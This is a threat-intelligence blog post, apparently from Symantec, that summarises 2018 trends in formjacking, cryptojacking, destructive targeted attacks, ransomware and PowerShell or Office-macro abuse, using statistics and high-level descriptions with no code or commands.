5 Key Takeaways From 12 Months in Cyber Security
Check out some of the key findings from Symantec’s recently-released Internet Security Threat Report (ISTR).
Read Symantec’s Internet Security Threat Report here.
Formjacking is the on-trend attack for cyber criminals
Formjacking — the use of malicious JavaScript code to steal credit card details and other information from payment forms on the checkout web pages of eCommerce sites — was one of the biggest cyber security trends of the last 12 months.
Symantec data found that an average of more than 4,800 unique websites were compromised with formjacking code every single month in 2018. To give that some context, and show why formjacking is so appealing for cyber criminals, the details of a single credit card could fetch up to $45 on underground markets, so even if just 10 credit cards were skimmed from each compromised website every month, this could result in an average monthly yield of up to $2.2 million for those involved.
Formjacking can be quite a subtle attack — the website will generally appear and work as normal for consumers, with no obvious signs that their payment card data is being slurped up by formjacking criminals. It’s possible formjacking code won’t be discovered on a website until the business receives reports of numerous customers’ payment cards having been skimmed. This means formjacking code could potentially be on a website slurping up data for a long time before it is removed.
We blocked more than a quarter of 2018’s total formjacking attempts in the last two months of the year — we blocked just over 3.7 million formjacking attempts in 2018 in total, but more than one million of those blocks occurred in November and December. No doubt this was partly because attackers were trying to take advantage of the busy holiday shopping season, but it also indicates that formjacking is an area of increasing interest to cyber criminals.
Cryptojacking is down but not out
Cryptojacking was one of the biggest stories on the cyber security landscape at the end of 2017 and the beginning of 2018. In January and February 2018, Symantec technologies were blocking more than 8 million cryptojacking events each month. This high level of activity was linked to the high value of cryptocurrencies at that time — Bitcoin had broken records in December 2017 when the value of one bitcoin exceeded $19,000, while the value of one Monero coin, which is what is primarily mined by cryptojacking criminals, hovered at around $400.
Cryptojacking is when cyber criminals surreptitiously run coinminers on victims’ devices without their knowledge and use their central processing unit (CPU) power to mine cryptocurrencies. This activity is mostly carried out within web browsers and is implemented using scripting languages. Visitors to a web page that has been infected with cryptojacking code will have their computing power used to mine for cryptocurrency. This activity is often not noticed by users, and one of the key appeals of cryptojacking is that it lets those behind it operate stealthily.
Cryptocurrency values decreased sharply during 2018, reducing the profitability and the appeal of cryptojacking. However, while the value of Monero dropped 90 percent, the rate of cryptojacking fell by significantly less than that — 52 percent — and Symantec still blocked 3.5 million cryptojacking events in December 2018. While interest in cryptocurrencies waned since the beginning of 2018, activity in this area remained significant.
Targeted attackers are out for destruction
Targeted attacks groups continue to have a significant impact on the cyber security threat landscape and posed a significant threat to organizations during 2018. Among one of the more interesting developments in the area of targeted attacks in 2018 was the increase in potentially disruptive attacks, with the number of targeted attack groups known to use destructive malware increasing by 25 percent.
Another major development on the targeted attack landscape in 2018 was the major increase in indictments issued by the U.S. against people alleged to be involved in state-sponsored espionage. Forty-nine indictments were issued in 2018, a stark increase from four in 2017 and five in 2016.
Ransomware — down overall but focus on enterprises
Overall ransomware activity fell in 2018, the first time activity in this area has fallen since 2013. The overall number of ransomware infections fell by 20 percent, however, enterprise ransomware infections increased by 12 percent. This is likely due to the fact that the chief ransomware distribution method in 2018 was email, with enterprises tending to be more affected by email-based attacks because email remains a primary communication tool for organizations. Ransomware has also become a less effective tool to use against consumers given the fact that many consumers now exclusively use mobile devices and have much of their data backed up in the cloud.
Despite the drop in ransomware activity, overall ransomware activity still remained high, and it is important to note too that it’s possible Symantec may be blocking ransomware earlier in the infection process: either via email protection or using technologies such as behavioral analysis or machine learning. Threats blocked at this earlier stage will not register as ransomware, so could be masking some ransomware activity.
Living off the land
Living off the land is a trend that has been increasingly adopted by cyber criminals in recent times, with a significant increase in certain activity in this area observed in 2018. PowerShell is now commonly used in both cyber crime and targeted attacks — with a 1,000 percent increase in malicious PowerShell scripts blocked on the endpoint in 2018. However, while Symantec blocks 115,000 malicious PowerShell scripts every month, this accounts for less than one percent of overall PowerShell usage.
Elsewhere, Microsoft Office files accounted for 48 percent of all malicious email attachments in 2018, an increase from 5 percent in 2017. Macros in these Office files were a preferred method used to propagate malicious payloads by cyber crime groups in 2018, while some groups also used malicious XML files and Office files with DDE payloads.
Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security. Click here to read the ISTR.
Like this story? Recommend it by hitting the heart button so others on Medium see it, and follow Threat Intel on Medium for more great content.
